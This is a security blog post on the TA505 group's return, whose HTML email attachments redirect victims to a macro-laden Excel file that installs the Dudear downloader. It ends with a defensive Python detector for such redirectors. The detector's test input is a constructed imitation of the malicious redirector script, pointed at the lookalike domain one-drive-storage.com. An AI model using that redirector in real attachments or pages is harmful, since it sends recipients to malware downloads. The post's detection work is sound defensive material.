
TA505 Returns From Hiatus

TA505: Researchers from Microsoft have observed the threat group TA505 return after a short period of no activity. Since 2014, the financially motivated group has been notorious for spreading remote access trojans (RATs) and banking trojans to compromise retailers and large financial institutions. The group has infected computers to drop trojans such as TrickBot and Dridex, as well as the Locky, BitPaymer, Philadelphia, GlobeImposter and Jaff ransomware families. In its newest campaign, the group attached HTML redirectors to emails. When opened, the HTML file redirects the victim's browser to download an Excel file whose malicious macros install the Dudear downloader. The campaign shows how the group has adapted its techniques in an attempt to evade detection: past campaigns delivered Dudear directly as an attachment or via a malicious URL in the email body. Sending an HTML file that automatically downloads the malicious document evades email threat scanners and makes it easier for victims to fall prey to the malware, since all they open is a seemingly harmless attachment. Different HTML files are used in different languages so that the attackers can target victims all over the world. Once executed, Dudear also attempts to drop the FlawedGrace RAT.

Analyst Notes

Defenders need to recognise when threat groups change their tactics to evade detection, because detection rules must be adapted accordingly. Email threat filters should be tuned to catch this type of inbound attachment. The HTML files used in this campaign contained JavaScript that calls the “setTimeout” function and then sets the window location to a download URL hosted on the domain one-drive-storage[.]com, a lookalike of the OneDrive name. Monitoring on the network and on endpoints is also important so that intrusions are found and stopped quickly, before they spread. Indicators of Compromise (IOCs) were published in Microsoft's Twitter thread about the campaign.
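One way to catch this redirector pattern at the mail gateway is to pull every script out of an HTML attachment and flag any script that assigns a new location to a host outside an allow list. The following is an added example written for this post; it is not code from Binary Defense, Microsoft, or the TA505 sample. The HTML inputs are constructed to imitate the technique (only the one-drive-storage[.]com domain comes from the post), and the allow list of legitimate file-sharing hosts is an assumption a deploying team would replace with its own.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample attachment modelled on the described technique: a script
# that waits, then sets window.location to a download URL. This is NOT the
# actual TA505 file; only the domain name is taken from the post.
SAMPLE_HTML = """<html><body>
<p>Your document is loading, please wait...</p>
<script>
  setTimeout(function () {
    window.location = "https://one-drive-storage.com/download/invoice.xls";
  }, 1500);
</script>
</body></html>"""

# Constructed benign attachment: a script that does not redirect anywhere.
BENIGN_HTML = """<html><body><p>Hello</p>
<script>document.title = "Newsletter";</script></body></html>"""

# Constructed attachment that redirects to an allow-listed host (should pass).
ALLOWED_HTML = """<html><body><script>
location.href = "https://onedrive.live.com/redir?resid=abc";
</script></body></html>"""

# Hosts the organisation legitimately links to from mail (assumption).
ALLOWED_DOMAINS = {"onedrive.live.com", "sharepoint.com"}


class ScriptExtractor(HTMLParser):
    """Collect the text content of every <script> element in a document."""

    def __init__(self):
        super().__init__()
        self._in_script = False
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data


# Navigation via assignment (window.location = "...", location.href = "...")
# or via location.assign("...") / location.replace("...").
LOCATION_NAV = re.compile(
    r"""(?:window\.|document\.|self\.|top\.)?location
        (?:(?:\.href)?\s*=\s*["']([^"']+)["']
          |\.(?:assign|replace)\s*\(\s*["']([^"']+)["'])""",
    re.IGNORECASE | re.VERBOSE,
)
DELAYED = re.compile(r"\bsetTimeout\s*\(", re.IGNORECASE)


def find_redirects(html):
    """Return [(target_url, delayed_by_setTimeout), ...] for every script
    in the document that navigates to a new location."""
    parser = ScriptExtractor()
    parser.feed(html)
    findings = []
    for script in parser.scripts:
        delayed = bool(DELAYED.search(script))
        for m in LOCATION_NAV.finditer(script):
            findings.append((m.group(1) or m.group(2), delayed))
    return findings


def _host_allowed(host, allowed):
    return host in allowed or any(host.endswith("." + d) for d in allowed)


def classify(html, allowed=ALLOWED_DOMAINS):
    """Verdict for an HTML attachment: ('suspicious', reasons) if any script
    redirects to a host outside the allow list, otherwise ('clean', [])."""
    reasons = []
    for url, delayed in find_redirects(html):
        host = urlparse(url).hostname or ""
        if _host_allowed(host, allowed):
            continue
        reason = "script redirects to " + host.replace(".", "[.]")  # defanged
        if delayed:
            reason += " via setTimeout"
        reasons.append(reason)
    return ("suspicious" if reasons else "clean", reasons)


if __name__ == "__main__":
    for name, doc in (("sample", SAMPLE_HTML), ("benign", BENIGN_HTML),
                      ("allowed", ALLOWED_HTML)):
        print(name, classify(doc))
```

The check deliberately keys on the behaviour (a script that navigates the window, optionally after a delay) rather than on the one domain from this campaign, since the next wave will use a different lookalike host; the allow list is what keeps legitimate "click here to open in OneDrive" mail from being quarantined.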

For more information: https://www.bleepingcomputer.com/news/security/microsoft-detects-new-ta505-malware-attacks-after-short-break/